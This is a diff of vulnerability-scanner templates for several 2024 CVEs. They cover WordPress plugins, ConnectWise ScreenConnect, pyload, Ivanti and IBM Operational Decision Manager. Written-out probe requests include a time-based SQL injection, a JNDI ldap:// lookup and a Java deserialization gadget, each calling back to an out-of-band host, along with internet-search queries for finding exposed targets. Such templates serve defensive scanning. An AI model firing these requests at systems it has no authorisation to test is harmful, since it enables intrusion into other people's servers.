- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
@ -21,7 +21,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
fofa-query: '"wordpress" && body="html5-video-player"'
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
max-request: 1
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http:
@ -36,4 +37,4 @@ http:
- 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")'
condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950

57
http/cves/2024/CVE-2024-1071.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2024-1071
info:
name: WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection
author: DhiyaneshDK,iamnooob
severity: critical
description: |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 2.8.3
reference:
- https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
- https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
classification:
cve-id: CVE-2024-1071
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
framework: wordpress
publicwww-query: "/wp-content/plugins/ultimate-member/"
zoomeye-query: app:"WordPress Ultimate Member Plugin"
fofa-query: body="/wp-content/plugins/ultimate-member"
tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains_all(body_2, "current_page", "total_pages")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"nonce":"([0-9a-z]+)"'
internal: true
# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950

51
http/cves/2024/CVE-2024-1208.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-1208
info:
name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
remediation: Fixed in 4.10.3
reference:
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1208
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-question"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"question_type":'
- '"points_total":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950

54
http/cves/2024/CVE-2024-1209.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2024-1209
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
- https://github.com/karlemilnikka/CVE-2024-1209
- https://nvd.nist.gov/vuln/detail/CVE-2024-1209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1209
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- 'slug":"assignment'
- '.pdf"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022033bf2ad75dd487b69924c9295b5366eb34cca9066811d2354a8a4e034a2e6089022100f1f2ee39c0db1395ace5d071d86ed18c10d824d16cc00024087e0b9bb1eb8a37:922c64590222798bb761d5b6d8e72950

52
http/cves/2024/CVE-2024-1210.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2024-1210
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1210
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"quiz_materials":'
- 'quizzes'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a00463044022079f0e028ee4fd33b5e897e0550a707be3dbe291e8085b9d175297108e9c8858102202a9344a25a6ec5fa1fc025e439a8887f6cc9c9ac50b6c199f1fa27e4cc948855:922c64590222798bb761d5b6d8e72950

56
http/cves/2024/CVE-2024-1709.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2024-1709
info:
name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
author: johnk3r
severity: critical
description: |
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
reference:
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
- https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2024-1709
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
vendor: connectwise
product: screenconnect
shodan-query: http.favicon.hash:-82958153
fofa-query: app="ScreenConnect-Remote-Support-Software"
zoomeye-query: app:"ScreenConnect Remote Management Software"
hunter-query: app.name="ConnectWise ScreenConnect software"
tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev
variables:
string: "{{rand_text_alpha(10)}}"
http:
- method: GET
path:
- "{{BaseURL}}/SetupWizard.aspx/{{string}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SetupWizardPage"
- "ContentPanel SetupWizard"
condition: and
- type: status
status:
- 200
extractors:
- type: kval
part: header
kval:
- Server
# digest: 4a0a00473045022100a74505da69fc5fb96361adc56f169fe3a2e25cf85bc6df3b254da6430f8f723f02200dd625105f73d1d23ede46af0dbee84cce441acdb5c91079411b20c841a8bf23:922c64590222798bb761d5b6d8e72950

11
http/cves/2024/CVE-2024-21645.yaml
View File

@ -6,25 +6,26 @@ info:
severity: medium
description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-21645
cwe-id: CWE-74
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.13723
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: pyload
product: pyload
shodan-query: title:"pyload"
shodan-query: "title:\"pyload\""
max-request: 2
tags: cve,cve2024,pyload,authenticated,injection
variables:
@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950

5
http/cves/2024/CVE-2024-21893.yaml
View File

@ -18,8 +18,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 1
tags: cve,cve2024,kev,ssrf,ivanti
http:
@ -43,4 +44,4 @@ http:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950

39
http/cves/2024/CVE-2024-22319.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2024-22319
info:
name: IBM Operational Decision Manager - JNDI Injection
author: DhiyaneshDK
severity: critical
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-22319
cwe-id: CWE-74
epss-score: 0.00283
epss-percentile: 0.67752
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http:
- method: GET
path:
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- 'contains(header, "application/json")'
- 'contains(body, "patchLevel\":")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950

49
http/cves/2024/CVE-2024-22320.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2024-22320
info:
name: IBM Operational Decision Manager - Java Deserialization
author: DhiyaneshDK
severity: high
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
reference:
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-22320
cwe-id: CWE-502
epss-score: 0.00283
epss-percentile: 0.67773
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
http:
- method: GET
path:
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'javax.servlet.ServletException'
- type: status
status:
- 500
# digest: 4a0a0047304502210098cb051d3eaa91348194c7ecd090833e583697c9d77cd778763d770664584db60220693f3bc37f42c69a6e2c7f3c052d0af3e6f5b6dabf1c36d80c23967672fc642b:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More